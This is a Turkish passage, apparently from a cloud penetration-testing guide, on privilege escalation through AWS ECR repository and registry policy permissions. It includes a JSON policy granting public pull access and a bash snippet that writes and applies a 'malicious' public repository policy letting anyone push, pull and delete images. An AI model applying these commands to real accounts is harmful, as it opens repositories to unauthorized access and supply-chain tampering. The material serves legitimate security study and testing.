Bu izinlere sahip bir saldırgan, ECR'ye giriş yapabilir ve görüntüleri yükleyebilir. Bu, bu görüntülerin kullanıldığı diğer ortamlarda ayrıcalıkları yükseltmek için kullanışlı olabilir.
Yeni bir görüntü yüklemeyi/güncellemeyi nasıl yapacağınızı öğrenmek için kontrol edin:
Önceki bölümle aynı, ancak halka açık depolar için geçerlidir.
ecr:SetRepositoryPolicy
Bu izne sahip bir saldırgan, depo politikasını değiştirebilir ve kendisine (veya herkese) okuma/yazma erişimi sağlayabilir.
Örneğin, bu örnekte herkese okuma erişimi verilmiştir.
{"Version":"2008-10-17","Statement": [{"Sid":"allow public pull","Effect":"Allow","Principal":"*","Action": ["ecr:BatchCheckLayerAvailability","ecr:BatchGetImage","ecr:GetDownloadUrlForLayer"]}]}
ecr-public:SetRepositoryPolicy
Önceki bölüm gibi, ancak halka açık depolar için geçerlidir.
Bir saldırgan, ECR Public deposunun politikasını değiştirerek yetkisiz halka açık erişim sağlayabilir veya ayrıcalıklarını yükseltebilir.
bashCopycode#CreateaJSONfilewiththemaliciouspublicrepositorypolicyecho'{"Version": "2008-10-17","Statement": [{"Sid": "MaliciousPublicRepoPolicy","Effect": "Allow","Principal": "*","Action": ["ecr-public:GetDownloadUrlForLayer","ecr-public:BatchGetImage","ecr-public:BatchCheckLayerAvailability","ecr-public:PutImage","ecr-public:InitiateLayerUpload","ecr-public:UploadLayerPart","ecr-public:CompleteLayerUpload","ecr-public:DeleteRepositoryPolicy"]}]}'>malicious_public_repo_policy.json# Apply the malicious public repository policy to the ECR Public repositoryaws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
Potansiyel Etki: Yetkisiz halka açık ECR Genel deposuna erişim, herhangi bir kullanıcının görüntüleri itme, çekme veya silme yetkisine sahip olmasına olanak tanır.
ecr:PutRegistryPolicy
Bu izne sahip bir saldırgan, kayıt defteri politikasını değiştirebilir ve kendisine, hesabına (veya hatta herkese) okuma/yazma erişimi sağlayabilir.